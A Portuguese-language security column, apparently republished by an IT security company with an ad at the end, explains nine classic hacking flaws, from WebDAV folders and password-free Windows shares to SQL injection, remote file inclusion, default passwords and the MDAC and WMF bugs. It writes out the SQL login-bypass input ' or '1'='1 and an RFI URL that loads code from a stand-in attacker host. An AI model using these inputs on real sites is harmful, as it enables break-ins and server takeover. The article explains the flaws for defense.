Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.) vá até o fim da reportagem e utilize a seção de comentários.
Hackers fazem coisas aparentemente incríveis, invadindo sistemas, desfigurando websites e obtendo informações secretas. No entanto, a ação deles é muitas vezes mais fácil do que se imagina, graças à existência de falhas de segurança absurdas que podem ser exploradas até por pessoas sem grandes conhecimentos em informática. E um dos segredos dos hackers é escolher os alvos certos (e fáceis). A coluna Segurança Digital traz hoje alguns exemplos.
1. “Pasta da Web”
Trata-se de uma falha popularmente conhecida como “Pasta da Web” ou “pdw”, devido ao recurso do Windows chamado “Pastas da Web” que permitia explorá-la. Nos Windows 95, 98 ou NT, bastava o hacker adicionar o site vulnerável em um recurso chamada “Pastas da Web” no Windows e as pastas e arquivos do site iriam aparecer. A partir daí era possível alterar o site como se altera qualquer arquivo no próprio computador.
O erro está na verdade ligado ao protocolo conhecido como WebDAV. É uma tecnologia para o gerenciamento de sites de internet. Infelizmente, muitos administradores de sistema esqueciam recursos usados no WebDAV ativados e sem senha, permitindo que qualquer pessoa alterasse a página da web.
O recurso de “Pasta da Web” ainda existe nas versões mais recentes no Windows, dentro da função “Mapear unidade de rede” em “Computador”. No entanto, é bem difícil encontrar sites com essa falha hoje em dia.
2. Compartilhamento sem senha e falha na autenticação
Em versões antigas do Windows, era comum criar compartilhamento de arquivo sem senha. Esse compartilhamento, que era destinado a computadores de uma rede local (como computadores de uma rede de escolas ou de uma empresa que acessavam os arquivos dos outros sistemas) ficava disponível na internet, permitindo que qualquer pessoa pudesse acessar os arquivos locais do computador.
Se a vítima estivesse vulnerável, bastava abrir o “Windows Explorer” e digitar “\\IP da vítima” na localização. Todas as pastas compartilhadas seriam exibidas, podendo ser lidas, modificadas ou apagadas. Por esse motivo, esse ataque ficou conhecido como “invasão por IP”, já que, no Windows, bastava saber o IP da vítima para explorar a falha.
No entanto, nem mesmo quem configurou a senha escapou do ataque. O Windows tinha uma falha de segurança que permitia o acesso apenas com o primeiro caractere da senha. Ou seja, se a senha era “iv9!0v#4%a5”, bastava tentar “i”. A vulnerabilidade, que existia nos Windows 95, 98 e ME, foi explorada por um vírus chamado Opaserv, que tentava todas as possibilidades de um caracteres, podendo assim invadir qualquer sistema com arquivo compartilhado que não tivesse aplicado a atualização de segurança.
3. Instalador esquecido
Muitos sites na internet são criados a partir de softwares prontos. Para isso, o responsável pelo site precisa “instalar” o software no site. Durante o processo de instalação, uma senha é configurada.
Em muitos casos, esses instaladores são esquecidos. Para hackear o site, tudo o que hacker precisa fazer é acessar o instalador, seguir as opções que aparecem na tela e reconfigurar a senha administrativa. Para encontrar sites vulneráveis, um hacker utiliza um software que tenta acessar endereços como “/setup/” ou “/install/” em sites de internet, até que um eventualmente esteja vulnerável.
Hoje, instaladores possuem funções de trava para que não sejam executados mais de uma vez – porque muita gente ainda se esquece de apagar o instalador após usá-lo.
4. FrontPage e senha on-line
O Microsoft FrontPage era um software para edição de sites de internet. Entre seus recursos estava a possibilidade de editar os sites on-line a partir do próprio programa, usando as “extensões do FrontPage” no servidor que abrigava a página on-line.
Por algum motivo, o FrontPage enviava para o site um arquivo contendo a senha de administrador. O arquivo sempre ficava disponível no mesmo endereço. Para hackear o site, bastava verificar se o arquivo existia, baixá-lo e quebrar a proteção usada para guardar a senha.
A brecha foi muito usada no final dos anos 90. Para resolver o problema, bastaria impedir a leitura do arquivo.
5. Injeção SQL clássica
Diante de uma tela de login e senha, o hacker coloca os seguintes valores, tanto no usuário como na senha: ‘ or ‘1’=’1
Essa sequência de apenas 11 caracteres interage com uma linguagem chamada de SQL, que é usada para consultas em bancos de dados. Funciona da seguinte forma: o usuário e a senha digitados no formulário precisam ser pesquisados no banco de dados: “existe um usuário ‘tal’ com a senha ‘tal’?”. E o programa precisa usar aspas simples para definir ‘tal’ e ‘tal’, de modo a diferenciar o argumento (‘tal’) da consulta (existe um usuário…).
Ao colocar aspas simples no formulário de login, o hacker quebra a lógica da pesquisa e o restante deixa de ser um valor a ser consultado, ou seja, o banco de dados não vai procurar por um usuário com aquele nome, mas interpretar aquilo que foi digitado como parte da consulta. Aqui começa a mágica: “or” é a palavra em inglês que significa “ou” e altera a lógica da “pergunta” que o banco de dados recebe. Com isso, a consulta final enviada ao banco de dados é: “existe um usuário ” ou ‘1’=’1′, com senha ” ou ‘1’=’1′?”
Como 1 sempre vai ser igual a 1 (1=1), o banco de dados retornará todos os usuários existentes no sistema. Como o software entende que apenas um usuário está se logando, ele vai usar o primeiro resultado presente no banco de dados – que geralmente é o usuário administrativo.
O resultado disso é um acesso completo ao sistema, sem precisar ter conhecimento do usuário e da senha.
Softwares protegidos contra essa falha impedem que as aspas simples sejam enviadas ao comando do banco de dados e também verificam se mais de um usuário foi retornado pela consulta – algo que nunca deve ocorrer.
6. Inclusão de Arquivo Remoto (Remote File Inclusion – RFI)
Por acaso você já viu algum site que usa endereços do tipo index.php?conteudo=precos.php? Nesse tipo de site, a parte “conteudo=precos.php” é especial, porque significa que o programa está buscando o valor de “conteudo” para carregar um arquivo (que nesse caso é precos.php). O valor “conteudo” pode ser qualquer coisa, como “inc=”, “area=” e por aí vai.
Tudo o que o hacker faz é substituir o valor, acessando algo como: “index.php?conteudo=http://sitedohacker.inv/programa-especial.php“. Com isso, a página carregará o programa-especial.php a partir do site do hacker. Esse programa poderá realizar a alteração (desfigurar) a página, ou mesmo dar o controle do servidor ao hacker. O hacker não precisa saber desenvolver esse programa especial, porque é possível encontrá-lo pronto na internet. Há diversos “sabores” – basta escolher.
Sites imunes a essa falha só carregam nomes e endereços autorizados dentro do código, ou seja, o programa entenderá que “conteudo” tem um valor inválido e ignorá-lo. Para evitar que clientes sejam invadidos, provedores de hospedagem costumam impedir o carregamento de endereços de internet dentro do código dos sites, protegendo dessa forma até mesmo os sites vulneráveis de ataque. Durante muito tempo, porém, essa falha permitiu a invasão de muitos sites e bastava colocar um endereço certo no navegador web para ativá-la.
7. Senha padrão
Ao configurar um site ou sistema, o administrador deixa a mesma senha que veio configurada de fábrica. Tudo o que hacker precisa fazer é consultar o manual de instruções do software ou hardware, checar a senha padrão e tentá-la. Se der certo, a invasão está concluída.
Hoje, muitos softwares geram senhas aleatórias durante sua instalação. Já equipamentos de hardware podem utilizar uma senha diferente para cada produto, baseada no número de série ou outro identificador que estiver disponível. Muitas invasões, porém, se deram com o usuário e senha “admin/admin”.
8. MDAC no Internet Explorer
O Windows, como sistema operacional, permite que administradores de sistema e programadores criem pequenos softwares, chamados de “scripts”. Esses scripts podem ter diversas funções, entre elas apagar, criar ou fazer download de arquivos.
Por erro, uma das funções responsáveis por manipular arquivos ficou acessível dentro do Internet Explorer no escopo da internet. Então, para infectar um computador, bastava ao site “pedir” ao Internet Explorer para baixar e executar um programa, e o navegador faria isso sem desconfiar de nada.
Normalmente, códigos que exploram vulnerabilidades não são nada bonitos, pois estão operando dentro de alguma condição de erro de um software. Não era o caso dessa falha. Como ela usava um recurso do próprio sistema, ela funcionava 100% do tempo, sem nenhum imprevisto.
Por esse motivo, essa vulnerabilidade foi largamente usada, especialmente por hackers brasileiros, e ainda pode ser vista em alguns “kits” de ataque na web, mesmo sendo antiga. Como é uma das falhas mais “limpas”, não faz sentido deixar de usá-la se o computador da vítima estiver vulnerável.
9. WMF
O WMF é um formato de arquivo de imagem antigo, criado no início da década de 90 para o Windows 3.0. Como na ocasião os computadores tinham poucos recursos, o WMF permitia “acelerar” coisas, tendo uma função para executar código no sistema, como se fosse programa, e não uma imagem. O formato foi esquecido, chegou a ser abandonado no Windows 2000, mas foi reintroduzido no Windows XP. Quando criminosos descobriram que bastava carregar uma imagem para executar um programa no Windows, a festa estava pronta.
Foi uma falha tão absurda que algumas pessoas chegaram a levantar a hipótese de que a Microsoft teria deixado isso como “porta dos fundos” para burlar a segurança do sistema. O principal defensor dessa teoria era o polêmico especialista Steve Gibson. A explicação mais simples, porém, é que ninguém se lembrava do recurso, e que ele foi colocado no Windows XP sem as devidas considerações de segurança.
Gostou desse artigo? Então não deixe sua rede desatualizada ou mesmo vulnerável a ataques de hackers. Contrate uma empresa especializada em segurança de dados e de TI com eficiência e agilidade em seus atendimentos.
Nós da MDF TECHNOLOGY temos mais de 20 anos de experiência de mercado em segurança da informação e de proteção de dados.
Entre em contato com nossa equipe de especialistas pelo Whatsapp e solicite uma visita ou proposta para sua empresa.